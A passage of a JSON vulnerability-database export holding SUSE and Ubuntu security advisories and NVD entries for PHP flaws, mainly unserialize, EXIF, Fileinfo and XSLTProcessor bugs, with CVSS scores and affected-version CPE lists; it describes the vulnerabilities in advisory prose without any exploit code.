ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate numerical keys within the\n serialized properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP allowed remote attackers to execute arbitrary code or cause a denial\n of service (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF\n extension in PHP operates on floating-point arrays incorrectly, which\n allowed remote attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute arbitrary code via\n a crafted JPEG image with TIFF thumbnail data that is improperly handled\n by the exif_thumbnail function (bsc#902357).\n - CVE-2014-3669: Integer overflow in the object_custom function in\n ext/standard/var_unserializer.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an 
argument to the unserialize function that triggers\n calculation of a large length value (bsc#902360).\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the\n mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in\n PHP allowed remote attackers to cause a denial of service (application\n crash) via (1) a crafted first argument to the xmlrpc_set_type function\n or (2) a crafted argument to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed\n local users to write to arbitrary files via a symlink attack on a (1)\n rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to\n the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in\n ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial\n of service (application crash) or possibly execute arbitrary code via a\n crafted DNS record, related to the dns_get_record function and the\n dn_expand function. 
NOTE: this issue exists because of an incomplete fix\n for CVE-2014-4049 (bsc#893853).\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n iterator usage within applications in certain web-hosting environments\n (bsc#886059).\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain web-hosting\n environments (bsc#886060).\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP\n did not ensure use of the string data type for the PHP_AUTH_PW,\n PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive information from\n process memory by using the integer data type with crafted values,\n related to a "type confusion" vulnerability, as demonstrated by reading\n a private SSL key in an Apache HTTP Server web-hosting environment with\n mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as\n used in the Fileinfo component in PHP allowed remote attackers to cause\n a denial of service (assertion failure and application exit) via a\n crafted CDF file (bsc#884986).\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c\n in file as used in the Fileinfo component in PHP allowed remote\n attackers to cause a denial of service (application crash) via a crafted\n Pascal string in a FILE_PSTRING conversion (bsc#884987).\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as\n used in the Fileinfo component in PHP relies on incorrect sector-size\n data, which allowed remote attackers to cause a denial of 
service\n (application crash) via a crafted stream offset in a CDF file\n (bsc#884989).\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in\n the Fileinfo component in PHP did not properly validate sector-count\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n - CVE-2014-3487: The cdf_read_property_info function in file as used in\n the Fileinfo component in PHP did not properly validate a stream offset,\n which allowed remote attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that\n certain data structures will have the array data type after\n unserialization, which allowed remote attackers to execute arbitrary\n code via a crafted string that triggers use of a Hashtable destructor,\n related to "type confusion" issues in (1) ArrayObject and (2)\n SPLObjectStorage (bsc#884992).\n\n These non-security issues were fixed:\n - bnc#935074: compare with SQL_NULL_DATA correctly\n - bnc#935074: fix segfault in odbc_fetch_array\n - bnc#919080: fix timezone map\n - bnc#925109: unserialize SoapClient type confusion\n\n", "cvss3": {}, "published": "2016-06-21T13:08:17", "type": "suse", "title": "Security update for php53 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9767", "CVE-2016-4342", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-5161", "CVE-2015-3329", "CVE-2014-3478", "CVE-2016-4540", "CVE-2016-4538", "CVE-2015-4644", "CVE-2015-8879", "CVE-2015-1352", "CVE-2016-3185", "CVE-2016-4544", "CVE-2015-2301", "CVE-2014-3515", "CVE-2014-3479", "CVE-2015-8867", "CVE-2014-9709", "CVE-2014-4670", "CVE-2015-2305", "CVE-2016-4543", "CVE-2014-3668", "CVE-2015-0273", "CVE-2016-4542", "CVE-2016-4541", "CVE-2014-3480", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", 
"CVE-2014-0207", "CVE-2016-2554", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-8835", "CVE-2015-4021", "CVE-2014-3487", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-3152", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-6833", "CVE-2014-4721", "CVE-2016-4070", "CVE-2014-4698", "CVE-2015-8874", "CVE-2015-3411", "CVE-2015-4116", "CVE-2014-4049", "CVE-2015-6831", "CVE-2014-3670", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2016-4539", "CVE-2015-6837", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-4073", "CVE-2015-7803", "CVE-2014-5459", "CVE-2015-4603", "CVE-2015-4599", "CVE-2016-5096", "CVE-2015-4598", "CVE-2015-8866", "CVE-2015-5589", "CVE-2016-3141", "CVE-2015-4643", "CVE-2015-8838", "CVE-2016-4346", "CVE-2015-0231", "CVE-2016-5114", "CVE-2004-1019", "CVE-2016-3142", "CVE-2015-6838", "CVE-2016-4537"], "modified": "2016-06-21T13:08:17", "id": "SUSE-SU-2016:1638-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00041.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2022-01-04T12:34:55", "description": "It was discovered that the PHP phar extension incorrectly handled certain \nfiles. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled certain \nfilepaths. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing \nobjects. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835\n\nSean Heelan discovered that PHP incorrectly handled unserializing \nobjects. 
A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled certain \narchives. A remote attacker could use this issue to cause files to be \nplaced outside of the destination directory. (CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated \ndata types. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled \ncertain data. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2015-6837)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-30T00:00:00", "type": "ubuntu", "title": "PHP vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5590", "CVE-2015-6837", "CVE-2015-6836", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6831", "CVE-2015-6838", "CVE-2015-6833", "CVE-2015-6832", 
"CVE-2015-5589"], "modified": "2015-09-30T00:00:00", "id": "USN-2758-1", "href": "https://ubuntu.com/security/notices/USN-2758-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:36:39", "description": "The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before 2.9.2 is used, does not consider the possibility of a NULL valuePop return value before proceeding with a free operation during initial error checking, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6838.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6837", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:xmlsoft:libxml2:2.9.1", "cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", 
"cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6837", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:40", "description": "The xsl_ext_function_php function in 
ext/xsl/xsltprocessor.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13, when libxml2 before 2.9.2 is used, does not consider the possibility of a NULL valuePop return value before proceeding with a free operation after the principal argument loop, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6837.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6838", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6837", "CVE-2015-6838"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:xmlsoft:libxml2:2.9.1", "cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", 
"cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", "cpe:/a:php:php:5.5.10", "cpe:/a:php:php:5.5.21", "cpe:/a:php:php:5.6.5", "cpe:/a:php:php:5.5.11"], "id": "CVE-2015-6838", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6838", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.28:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.26:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:xmlsoft:libxml2:2.9.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:5.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.44:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha6:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:alpha5:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.5.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:36:36", "description": "The session deserializer in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 mishandles multiple php_var_unserialize calls, which allow remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted session content.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-16T10:59:00", "type": "cve", "title": "CVE-2015-6835", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6835"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:php:php:5.5.28", "cpe:/a:php:php:5.5.8", "cpe:/a:php:php:5.6.10", "cpe:/a:php:php:5.6.4", "cpe:/a:php:php:5.5.14", "cpe:/a:php:php:5.5.6", "cpe:/a:php:php:5.5.22", "cpe:/a:php:php:5.6.1", "cpe:/a:php:php:5.5.0", "cpe:/a:php:php:5.5.5", "cpe:/a:php:php:5.6.12", "cpe:/a:php:php:5.5.27", "cpe:/a:php:php:5.5.26", "cpe:/a:php:php:5.6.0", "cpe:/a:php:php:5.5.15", "cpe:/a:php:php:5.5.7", "cpe:/a:php:php:5.6.7", "cpe:/a:php:php:5.6.9", "cpe:/a:php:php:5.5.18", "cpe:/a:php:php:5.5.4", "cpe:/a:php:php:5.5.23", "cpe:/a:php:php:5.5.17", "cpe:/a:php:php:5.5.9", "cpe:/a:php:php:5.5.24", "cpe:/a:php:php:5.6.3", "cpe:/a:php:php:5.5.20", "cpe:/a:php:php:5.6.2", "cpe:/a:php:php:5.5.13", "cpe:/a:php:php:5.5.2", "cpe:/a:php:php:5.4.44", "cpe:/a:php:php:5.5.12", "cpe:/a:php:php:5.5.3", "cpe:/a:php:php:5.5.25", "cpe:/a:php:php:5.6.11", "cpe:/a:php:php:5.5.16", "cpe:/a:php:php:5.6.8", "cpe:/a:php:php:5.5.1", "cpe:/a:php:php:5.5.19", "cpe:/a:php:php:5.6.6", 
